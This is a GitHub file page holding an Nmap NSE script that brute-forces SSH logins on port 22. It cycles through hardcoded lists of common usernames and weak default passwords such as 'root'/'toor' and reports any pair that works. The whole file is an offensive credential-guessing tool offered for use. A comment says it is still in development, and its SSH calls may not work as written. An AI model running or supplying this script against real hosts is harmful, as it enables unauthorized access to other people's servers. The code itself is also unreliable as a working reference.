Nmap-scripts/ssh_bruteforce.nse at main · Asko7779/Nmap-scripts · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
-- this script is still in development

description = [[
    attempts to brute force SSH credentials with a list of usernames and passwords
]]

author = "Asko7779"
license = "Same as Nmap"
categories = {"brute", "intrusive"}

portrule = function(host, port)
    return port.number == 22 and port.state == "open"
end


action = function(host, port)

    -- adjustable credentials

    local usernames = {
    "admin", "root", "guest", "user", "ssh", "test", "ubuntu", "pi", "admin1", "oracle",
    "user1", "support", "ftp", "webmaster", "linux", "sysadmin", "operator", "superuser",
    "remote", "default", "guestuser", "admin123", "developer", "adminadmin" }

    local passwords = {
    "admin", "toor", "guest", "1234", "ssh", "root", "password", "12345", "123456",
    "welcome", "letmein", "admin123", "qwerty", "password1", "123123", "abc123", "letmein123",
    "root123", "123qwe", "123qweasd", "changeme", "password123", "test123", "guest123",
    "user123", "superuser", "default", "password1", "hello123", "1234root"}


    local ssh = nmap.new_ssh_client()

    for _, user in ipairs(usernames) do
        for _, pass in ipairs(passwords) do

            local success, err = ssh:connect(host.ip, port.number, user, pass)

            if success then
                return "Valid credentials found: " .. user .. " / " .. pass
            end
        end
    end


    return "[-] Brute force attempt unsuccessful"
end